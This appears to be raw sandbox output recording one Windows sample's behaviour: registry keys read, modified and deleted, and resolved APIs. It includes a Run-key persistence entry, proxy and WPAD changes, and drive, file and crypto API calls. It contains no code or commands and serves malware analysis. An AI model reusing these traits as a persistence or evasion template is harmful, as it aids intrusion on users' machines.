HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2280033686-3172497658-34815073811000\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET EXPLORER\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wsmprovhost.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\wsmprovhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET EXPLORER\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET
EXPLORER\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\wsmprovhost.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\INTERNET EXPLORER\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\IsolatedCommand
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\InheritConsoleHandles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\ABB0EA2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000804
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B196B286-BAB4-101A-B69C00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B7984CC409A1F}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B7984CC409A1F}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B7984CC409A1F}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Log File Max Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\WMIC.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_HANDLING\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.xml\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\text/xml\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{807573E5-5146-11D5-A672-00B0D022E945}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F2688ABE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\GipActivityBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IsTextPlainHonored
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh-Hans
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\zh
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
修改的注册表键
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\FIX2-uhitkt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\wsmprovhost_RASMANCS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\wsmprovhost_RASMANCS\FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{5B678A52-EAE8-4CE7-983B-7984CC409A1F}\fe-5400-3f-32-f9
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\fe-54-00-3f-32-f9\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
删除的注册表键
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
API解析
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.GetProcessHeap
kernel32.dll.HeapAlloc
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
rpcrt4.dll.I_RpcInitNdrImports
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdipCloneImage
gdiplus.dll.GdipSaveImageToFile
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipCreateBitmapFromHBITMAP
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipAlloc
gdiplus.dll.GdipFree
kernel32.dll.GetModuleHandleA
kernel32.dll.GetFileSize
kernel32.dll.SetFilePointer
kernel32.dll.GetDriveTypeW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.HeapFree
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesW
kernel32.dll.ReadFile
kernel32.dll.CreateFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.CloseHandle
kernel32.dll.SetFileAttributesW
kernel32.dll.FreeLibrary
kernel32.dll.QueryPerformanceCounter
kernel32.dll.GetTickCount
kernel32.dll.LoadLibraryW
kernel32.dll.GetVersionExW
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetCurrentProcess
kernel32.dll.Sleep
kernel32.dll.GetStringTypeW
kernel32.dll.MultiByteToWideChar
kernel32.dll.RtlUnwind
kernel32.dll.SetStdHandle
kernel32.dll.WriteConsoleW
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.HeapSize
kernel32.dll.GlobalMemoryStatus
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetConsoleMode
kernel32.dll.GetLastError
kernel32.dll.EnterCriticalSection
kernel32.dll.LeaveCriticalSection
kernel32.dll.HeapReAlloc
kernel32.dll.GetCommandLineW
kernel32.dll.HeapSetInformation
kernel32.dll.GetStartupInfoW
kernel32.dll.TerminateProcess
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.SetUnhandledExceptionFilter
kernel32.dll.IsDebuggerPresent
kernel32.dll.HeapCreate
kernel32.dll.GetCPInfo
kernel32.dll.InterlockedIncrement
kernel32.dll.InterlockedDecrement
kernel32.dll.GetACP
kernel32.dll.GetOEMCP
kernel32.dll.IsValidCodePage
kernel32.dll.TlsAlloc
kernel32.dll.TlsGetValue
kernel32.dll.TlsSetValue
kernel32.dll.TlsFree
kernel32.dll.GetModuleHandleW
kernel32.dll.SetLastError
kernel32.dll.GetCurrentThreadId
kernel32.dll.LCMapStringW
kernel32.dll.ExitProcess
kernel32.dll.GetStdHandle
kernel32.dll.GetModuleFileNameW
kernel32.dll.SetHandleCount
kernel32.dll.GetFileType
kernel32.dll.DeleteCriticalSection
kernel32.dll.WideCharToMultiByte
kernel32.dll.GetConsoleCP
user32.dll.DrawTextA
user32.dll.GetDC
user32.dll.LoadStringW
gdi32.dll.SetBkMode
gdi32.dll.DeleteObject
gdi32.dll.SelectObject
gdi32.dll.CreateFontW
gdi32.dll.GetStockObject
gdi32.dll.SetTextColor
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindExtensionW
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
cryptbase.dll.SystemFunction036
ole32.dll.CoCreateInstance
ole32.dll.CoInitializeEx
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
user32.dll.UnregisterDeviceNotification
user32.dll.RegisterDeviceNotificationW
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.Wow64DisableWow64FsRedirection
kernel32.dll.Wow64RevertWow64FsRedirection
ntmarta.dll.GetMartaExtensionInterface
comctl32.dll.#334
advapi32.dll.OpenThreadToken
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
comctl32.dll.#321
netapi32.dll.NetStatisticsGet
netapi32.dll.NetApiBufferFree
advapi32.dll.CryptAcquireContextW
advapi32.dll.CryptGenRandom
advapi32.dll.CryptReleaseContext
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Heap32First
kernel32.dll.Heap32Next
kernel32.dll.Heap32ListFirst
kernel32.dll.Heap32ListNext
kernel32.dll.Process32First
kernel32.dll.Process32Next
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.Module32First
kernel32.dll.Module32Next
ole32.dll.OleInitialize
ole32.dll.CreateBindCtx
ole32.dll.CoTaskMemAlloc
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PSPropertyBag_WriteDWORD
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoGetMalloc
propsys.dll.PSPropertyBag_ReadDWORD
propsys.dll.PSPropertyBag_ReadGUID
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
advapi32.dll.RegEnumKeyW
apphelp.dll.ApphelpCheckShellObject
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
comctl32.dll.#328
oleaut32.dll.#2
shell32.dll.#102
propsys.dll.PSPropertyBag_ReadStrAlloc
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#332
comctl32.dll.#338
ole32.dll.CoUninitialize
sechost.dll.ConvertSidToStringSidW
profapi.dll.#104
propsys.dll.#430
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegGetValueW
advapi32.dll.RegCloseKey
ole32.dll.CoTaskMemRealloc
propsys.dll.InitPropVariantFromStringAsVector
propsys.dll.PSCoerceToCanonicalValue
propsys.dll.PropVariantToStringAlloc
ole32.dll.PropVariantClear
ole32.dll.CoAllowSetForegroundWindow
shell32.dll.SHGetFolderPathW
advapi32.dll.SaferGetPolicyInformation
